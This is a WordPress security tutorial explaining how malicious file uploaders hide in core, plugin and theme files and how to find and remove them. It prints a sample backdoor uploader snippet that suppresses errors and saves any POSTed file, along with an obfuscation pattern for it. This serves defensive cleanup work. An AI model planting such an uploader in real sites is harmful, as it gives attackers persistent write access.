Finding and Removing Malicious File Uploaders
The WordPress Security Learning Center
Finding and Removing Malicious File Uploaders

3.7: Finding and Removing Malicious File Uploaders

Advanced
Updated March 8, 2018

What is a Malicious File Uploader?

A malicious file uploader is a file or script that allows an attacker to upload additional files for the purpose of malicious usage. Malicious uploaders usually will allow any file to be uploaded to the website without any security checks, creating great risk to the website. An uploader can look like normal site code or can be obfuscated (intentionally obscured to make code ambiguous). It can be a stand alone file, or it can be inserted into a normal site file, either within core files, plugin files, or theme files.

Determining if your site is infected

A file uploader alone is hard to detect from a casual review of site files. Usually, a site owner is alerted to the presence of more obvious malicious files, either spam pages, spam links, or malicious redirects, and a review of the site files finds a malicious file uploader hidden somewhere within the site files.

Finding and Removing Malicious File Uploader

Removal of malicious file uploaders requires an analysis of the site code. File uploaders are typically found within php files on the web server. They can either be inserted into your core, plugin, or theme files, or they can be a standalone file. Malicious file uploaders can be found in any publicly accessible directory on your server.

Sometimes the malicious file uploader is obfuscated and it will not appear to do anything specific at first glance. You may need to decode the obfuscation to determine what the file is doing. Obfuscated code may contain the following within it.

base64_decode(...aW5wdXQgdHlwZT0iZmlsZSI=...)

Other times, the code will be a combination of html and php and it will have references to files being uploaded. A non obfuscated file upload script usually contains a form with a field type like input type=”file” within it. Not all upload scripts are malicious, however, so determining if a file is malicious, unprotected, or suspicious in any other way will require an analysis of the surrounding code.

To remove the file uploader, determine which file contains the upload scripts and remove the file or the code within the valid file. The file upload script typically is a form that uses the file input type in order to select the file from the attacker.

Here is an example of a file uploader appended to the top of a theme file.

@ini_set('display_errors','off'); 
@ini_set('log_errors',0); 
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0); 
ignore_user_abort(true); 
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000'); 
$size=$_POST['size']; 
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name']; 
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp); 

You can search your site files for any form input that has an input type=file. An unobfuscated form might look similar to this. As it is all valid HTML code, virus scanners may not detect malicious intent.

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="AnyNameHere" id="AnyNameHere">
    <input type="submit" value="Upload Image" name="submit">
</form>

Looking Beyond the Malicious File Uploader

If you find a malicious file uploader script on your web site, it is important to not only determine how that file was placed on your site, but also to find any other malicious scripts on your site. Attackers often place more than one upload script on a site, and they often are coupled with more malicious attacks such as malicious redirects, spam pages, or defacements.

It is also important to determine how the site was compromised. A review of the entire site is important.

If after reading this guide, you are unsure of how to remove malicious upload scripts, if you are looking for more answers as to how the malicious file uploader were placed on your site, get help.

Did you enjoy this post? Share it!

The WordPress Security Learning Center

From WordPress security fundamentals to expert developer resources, this learning center is meant for every skill level. Get serious about WordPress Security, start right here.